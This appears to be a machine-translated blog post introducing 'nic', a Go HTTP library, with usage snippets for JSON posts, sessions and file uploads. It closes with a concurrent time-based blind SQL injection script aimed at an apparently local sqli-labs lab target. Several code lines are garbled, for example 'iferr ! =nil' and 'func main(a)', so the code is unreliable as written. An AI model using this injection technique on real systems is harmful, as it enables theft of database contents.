The Golang HTTP standard library has been wrapped to provide a more elegant API, similar to python-requests for python-urllib
Making the address
The sample code
import (
"github.com/eddieivan01/nic"
)
func main(a) {
url := "http://example.com"
resp, err := nic.Post(url, &nic.H{
JSON: nic.KV {
"hello": "world",
},
Headers: nic.KV{
"X-Forwarded-For": "127.0.0.1",}})iferr ! =nil {
fmt.Fatal(err.Error())
}
fmt.Println(resp.Text)
// Modify the response code
err = resp.SetEncode("gbk")
iferr ! =nil {
fmt.Fatal(err.Error())
}
fmt.Println(resp.Text)
}
Copy the code// Session keeps cookies
session := &nic.Session{}
session.Post("http://example.com/login", &nic.H{
Data: nic.KV{
"uname": "nic"."passwd": "nic",
}
})
resp, _ := session.Get("http://example.com/userinfo".nil)
fmt.Println(resp.Text)
Copy the code// Upload the file
resp, err := nic.Post(url, &nic.H{
Files : nic.F{
"file" : nic.KV{
// 'filename' is a mandatory parameter, the local file path
// 'nic.go' will be used as filename for the MIME form
"filename" : `/home/nic/nic.go`."token" : "0xff",}}})Copy the codeRecently I tried it, SQL time blind footnote, combined with Goroutine is much more efficient than SQLmap
package main
import (
"fmt"
"time"
"github.com/eddieivan01/nic"
)
var flag = [32]byte{}
func display(a) {
for {
time.Sleep(time.Duration(1) * time.Second)
fmt.Println(string(flag[:]))
}
}
func main(a) {
payload := `select flag from flag`
var url string
for i := 1; i < 30; i++ {
go func(i int) {
for _, j := range []byte("{}qwertyuioplkjhgfdsazxcvbnm098764321_") {
url = fmt.Sprintf("Http://127.0.0.1/sqli/Less-1/? id=1' and if(mid((%s),%d,1)='%v',sleep(3),0)-- -", payload, i, string(j))
_, err := nic.Get(url, &nic.H{
Timeout: 3,})iferr ! =nil {
flag[i- 1] = byte(j)
return
}
}
}(i)
}
display()
}
Copy the codeSuggestions for adding new features/ improving existing ones are welcome